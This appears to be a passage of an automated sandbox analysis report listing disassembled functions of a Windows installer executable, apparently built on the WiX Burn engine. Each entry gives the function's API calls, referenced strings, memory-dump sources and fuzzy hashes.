Opcode ID: dab212cef3fc0133e70570b2cf6ecf0b82e07653da2f0d9903d348bb8da98746
Instruction ID: 1d040b372d87d9f887b2fe4ba56af2b3928e29cad0ff2d79d6b952769722d94c
Opcode Fuzzy Hash: dab212cef3fc0133e70570b2cf6ecf0b82e07653da2f0d9903d348bb8da98746
Instruction Fuzzy Hash: 7301DE72E05669BBDB11DB56D848AAEBBA8FF15322B00421AE805D3680D734EA04C7D4

Function 004EDC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,004EDDEE), ref: 004EDC92
LeaveCriticalSection.KERNEL32(00000008,?,004EDDEE), ref: 004EDCD7
SetEvent.KERNEL32(?,?,004EDDEE), ref: 004EDCEB

Strings

Failure while sending progress., xrefs: 004EDCC6
Failed to get BITS job state., xrefs: 004EDCAB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: c3e97ab4106d6465aca0cd798165fb48b4b86599137d7e4c8740b7782868847a
Instruction ID: aecb21bf1ae9cf07f257fffb81534638cd82b513e91380f3ee6160eb3f6582a4
Opcode Fuzzy Hash: c3e97ab4106d6465aca0cd798165fb48b4b86599137d7e4c8740b7782868847a
Instruction Fuzzy Hash: 99012472E01725FBCB259B46D88999EBBACFF04362B100256F90593680DB74ED04D7D8

Function 004ED7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,004EDF52,?,?,?,?,?,?,00000000,00000000), ref: 004ED802
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,004EDF52,?,?,?,?,?,?,00000000,00000000), ref: 004ED80D
GetLastError.KERNEL32(?,004EDF52,?,?,?,?,?,?,00000000,00000000), ref: 004ED81A

Strings

Failed to create BITS job complete event., xrefs: 004ED848
bitsengine.cpp, xrefs: 004ED83E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsengine.cpp
API String ID: 3069647169-3441864216
Opcode ID: 4f61bca83714c86f725b926ada1c21ab906bdb16bbf0acfc9438aecb06f2d75f
Instruction ID: 876be6aa6264dbb3ee4837e13841942a4e860098a959b12d883c03e25aa15c91
Opcode Fuzzy Hash: 4f61bca83714c86f725b926ada1c21ab906bdb16bbf0acfc9438aecb06f2d75f
Instruction Fuzzy Hash: 2D01B576901633ABD310AF56D805A4BBFA8FF19721B004116FD18E7781D7749800CBE4

Function 004CD4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,004D7040,000000B8,00000000,?,00000000,76C1B390), ref: 004CD4B7
InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 004CD4C6
LeaveCriticalSection.KERNEL32(000000D0,?,004D7040,000000B8,00000000,?,00000000,76C1B390), ref: 004CD4DB

Strings

userexperience.cpp, xrefs: 004CD4F4
Engine active cannot be changed because it was already in that state., xrefs: 004CD4FE

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: 3cc9b61f600348fccc8adb6d5bc2c395fec33e25540b1a2a92d9423801c69a42
Instruction ID: eeddfec6386a8ca406e0de6a356a48fe42f66c5e8bd60321b85fc7d228abe652
Opcode Fuzzy Hash: 3cc9b61f600348fccc8adb6d5bc2c395fec33e25540b1a2a92d9423801c69a42
Instruction Fuzzy Hash: C0F0A47A3003056FD7209EA6DCC8D9B77ACFB95765700442EF601C3680D674E9058774

Function 00501C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00501CB3
GetLastError.KERNEL32(?,004C49DA,00000001,?,?,004C4551,?,?,?,?,004C5466,?,?,?,?), ref: 00501CC2

Strings

srclient.dll, xrefs: 00501C91
srputil.cpp, xrefs: 00501CE3
SRSetRestorePointW, xrefs: 00501CA8

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 199729137-398595594
Opcode ID: 7087f879d3ad4dd8ff5f46b1e15563da7bae3b967fd9849590aa520e6f12592b
Instruction ID: f2b022729a026c31b0b58f17ccbf458d72800a359e8456f31b5fb2b1910d3c4a
Opcode Fuzzy Hash: 7087f879d3ad4dd8ff5f46b1e15563da7bae3b967fd9849590aa520e6f12592b
Instruction Fuzzy Hash: 0201A23BAC1A3653E2321AA56C0AB1E2E847F117A1F014126BD00AB2D0D725EC40E6DF

Function 004F495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004F490E,00000000,?,004F48AE,00000000,00527F08,0000000C,004F4A05,00000000,00000002), ref: 004F497D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004F4990
FreeLibrary.KERNEL32(00000000,?,?,?,004F490E,00000000,?,004F48AE,00000000,00527F08,0000000C,004F4A05,00000000,00000002), ref: 004F49B3

Strings

CorExitProcess, xrefs: 004F4988
mscoree.dll, xrefs: 004F4976

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6328af27476882e78fd73e61aee5aa64464631e23184a6b37a95136c8a829b05
Instruction ID: 995b222f0bdae2d8f1d26abd99f6f5894144eb6da0898e035f0d6464c3393506
Opcode Fuzzy Hash: 6328af27476882e78fd73e61aee5aa64464631e23184a6b37a95136c8a829b05
Instruction Fuzzy Hash: 66F04F30A0061CBBDB119FA1DC59BAFBFB8EF55711F00406AF905A2290DBB54A84DA99

Function 004C21AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C21F2
GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C21FE

Part of subcall function 004C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BDB
Part of subcall function 004C3BD3: HeapSize.KERNEL32(00000000,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BE2

Strings

strutil.cpp, xrefs: 004C2222

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: f6d5216310d3a0680e12ae3cf43e03b4274b817501afe07cb86f2f20e5cea533
Instruction ID: 63a232e7ca18b7324b1ab3e9ad90dc2cdd41e5bfe6242d1286933ab9966679ea
Opcode Fuzzy Hash: f6d5216310d3a0680e12ae3cf43e03b4274b817501afe07cb86f2f20e5cea533
Instruction Fuzzy Hash: 77311B3E600226ABD7A08EA5CD44F6B3B95AF15774B1142AEFC119B390E6F9CC0096D9

Function 005094FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 005095D5
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00509610
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 0050962C
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00509639
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00509646

Part of subcall function 00500FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,005095C2,00000001), ref: 00500FED

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 35ef83d61a49b90a6525954712911653949e1a4366844f5d135452a0de0e3477
Instruction ID: e6eb4a3f5a28f5840e3b24eaad3eee8fe3bf74fc1531ca0311b09a7ef76749b3
Opcode Fuzzy Hash: 35ef83d61a49b90a6525954712911653949e1a4366844f5d135452a0de0e3477
Instruction Fuzzy Hash: 17414C72C0162EFFDF21AF948D819ADFEB9FF14750F15416AE910761A2C7324E50AA90

Function 004C8A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,004C8BC8,004C972D,?,004C972D,?,?,004C972D,?,?), ref: 004C8A27
lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,004C8BC8,004C972D,?,004C972D,?,?,004C972D,?,?), ref: 004C8A2F
CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,004C8BC8,004C972D,?,004C972D,?), ref: 004C8A7E
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,004C8BC8,004C972D,?,004C972D,?), ref: 004C8AE0
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,004C8BC8,004C972D,?,004C972D,?), ref: 004C8B0D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString$lstrlen
String ID:
API String ID: 1657112622-0
Opcode ID: e83e2f8270a5d341979fa0cc3c377e1e5b90a2f35d1354705deccbbe821e2a66
Instruction ID: d6c2faf6712416b3a12ba6754ba0e35295303c38106f017f7afc177c30843715
Opcode Fuzzy Hash: e83e2f8270a5d341979fa0cc3c377e1e5b90a2f35d1354705deccbbe821e2a66
Instruction Fuzzy Hash: 17315276A00108BFCB618F59CC85FAF3F6AEB58390F14402FF90987210CA7A9D91DB65

Function 004C74B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004C53BD,WixBundleOriginalSource,?,?,004DA623,840F01E8,WixBundleOriginalSource,?,0052AA90,?,00000000,004C5445,00000001,?,?,ETL), ref: 004C74C3
LeaveCriticalSection.KERNEL32(004C53BD,004C53BD,00000000,00000000,?,?,004DA623,840F01E8,WixBundleOriginalSource,?,0052AA90,?,00000000,004C5445,00000001,?), ref: 004C752A

Strings

WixBundleOriginalSource, xrefs: 004C74BF
Failed to get value of variable: %ls, xrefs: 004C74FD
Failed to get value as string for variable: %ls, xrefs: 004C7519

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
API String ID: 3168844106-30613933
Opcode ID: 6a764275f886502c53d853a2dd43a5ace1a6728f91cd209f19661e6b545dee7f
Instruction ID: dff26a163406981dcf4fe5bd7be6966e47fa597ae62fc4e038b3ffb85ff32eaa
Opcode Fuzzy Hash: 6a764275f886502c53d853a2dd43a5ace1a6728f91cd209f19661e6b545dee7f
Instruction Fuzzy Hash: A701B13A944129FBCF215F50CC05F9E7F68EF10365F10416AFD04AA660C33A9E119BD9

Function 004ED152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,004ED148,00000000), ref: 004ED16D
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,004ED148,00000000), ref: 004ED179
CloseHandle.KERNEL32(0050B518,00000000,?,00000000,?,004ED148,00000000), ref: 004ED186
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,004ED148,00000000), ref: 004ED193
UnmapViewOfFile.KERNEL32(0050B4E8,00000000,?,004ED148,00000000), ref: 004ED1A2

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 69392dd66f7473e405a8320537191db4684878a66f44e9019e22667495793c39
Instruction ID: 09abfca41c78cf2fb051259098a386e1eb555bda1cd1cc5df588d78409baa8f9
Opcode Fuzzy Hash: 69392dd66f7473e405a8320537191db4684878a66f44e9019e22667495793c39
Instruction Fuzzy Hash: BA01F676800B56DFCB31AF66D98081BF7E9AF60712315C93FE1A652A30C375A890DF44

Function 00508713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00508820
GetLastError.KERNEL32 ref: 0050882A

Strings

timeutil.cpp, xrefs: 0050884E
clbcatq.dll, xrefs: 00508731, 0050873C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Time$ErrorFileLastSystem
String ID: clbcatq.dll$timeutil.cpp
API String ID: 2781989572-961924111
Opcode ID: fa2733a2701ccdc5dcecffbc94a4ea53b6dcf615b381fa1301ba52597de19c21
Instruction ID: 888e11304aa67b527371dadbfd26657e3f82eaad1ee8ed278e80294663fe2879
Opcode Fuzzy Hash: fa2733a2701ccdc5dcecffbc94a4ea53b6dcf615b381fa1301ba52597de19c21
Instruction Fuzzy Hash: 0441F536A0021A76D7209BB58C45F7F7F64FF50700F55892DA641B72C4ED35CE0087A5

Function 005036CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(000002C0), ref: 005036E6
SysAllocString.OLEAUT32(?), ref: 005036F6
VariantClear.OLEAUT32(?), ref: 005037D5

Strings

xmlutil.cpp, xrefs: 0050370E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: 920fc094e81f62ba9ceb15a497f1ba16dd33996eca9a3ce7672d2779c9f543ea
Instruction ID: 5742321ebf5a09360dfeef2b6c56df0e042afbf9ce6506afc6448209a6943e59
Opcode Fuzzy Hash: 920fc094e81f62ba9ceb15a497f1ba16dd33996eca9a3ce7672d2779c9f543ea
Instruction Fuzzy Hash: B44144B5A00625ABCB219FA5C888EAEBBBCFF45710F1545A5FC05EB251D635DE008B90

Function 00500E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,004E8E1B), ref: 00500EAA
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004E8E1B,00000000), ref: 00500EC8
RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,004E8E1B,00000000,00000000,00000000), ref: 00500F1E

Strings

regutil.cpp, xrefs: 00500EEE

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: eb4b7f2efbf30f327275d5745407da85fa2e9be8f096d993f97bd19b84246bf5
Instruction ID: 38ea7d5c255435c5c79db6403e3220f3f58d3e843e21acbe79ee7575a43bdd5f
Opcode Fuzzy Hash: eb4b7f2efbf30f327275d5745407da85fa2e9be8f096d993f97bd19b84246bf5
Instruction Fuzzy Hash: 0531907690112ABBEB318A95CD80FAFBF6DFF04750F15446ABD04BB2D0D7719E10A6A0

Function 004E8B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,004E8E57,00000000,00000000), ref: 004E8BD4

Strings

Failed to ensure there is space for related bundles., xrefs: 004E8B87
Failed to initialize package from related bundle id: %ls, xrefs: 004E8BBA
Failed to open uninstall key for potential related bundle: %ls, xrefs: 004E8B43

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: 89da02ad8d538b2873c8c45ee4a8519e90e87c1c94b2b219267f079547fafda5
Instruction ID: 22796537fa98171ab53005ebeeb483494c39eb859f2c8802898ce3296c0cf7c0
Opcode Fuzzy Hash: 89da02ad8d538b2873c8c45ee4a8519e90e87c1c94b2b219267f079547fafda5
Instruction Fuzzy Hash: A321B6B294015AFFDF129E41CC46FEEBB78FF14312F10405AF91466190DB75AA20E794

Function 004C3B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,004C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,004C13B8), ref: 004C3B33
HeapReAlloc.KERNEL32(00000000,?,004C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,004C13B8,000001C7,00000100,?,80004005,00000000), ref: 004C3B3A

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

Part of subcall function 004C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BDB
Part of subcall function 004C3BD3: HeapSize.KERNEL32(00000000,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BE2

_memcpy_s.LIBCMT ref: 004C3B86

Strings

memutil.cpp, xrefs: 004C3BC7

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$Process$AllocAllocateSize_memcpy_s
String ID: memutil.cpp
API String ID: 3406509257-2429405624
Opcode ID: 009f0056d1630fb5d4003728fc6f8678adadb8862c8855bb8f6d64d8e87c0d0d
Instruction ID: d338604b5090ed36982137fdf5be5c8b77ece3143613ad4b8652c69c9ca2a75e
Opcode Fuzzy Hash: 009f0056d1630fb5d4003728fc6f8678adadb8862c8855bb8f6d64d8e87c0d0d
Instruction Fuzzy Hash: 72110539504119ABCB626F28CC44F6F3A599F40729B04C21EF8149B363E63AEF1092D8

Function 0050894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00508991
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005089B9
GetLastError.KERNEL32 ref: 005089C3

Strings

inetutil.cpp, xrefs: 005089E4

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
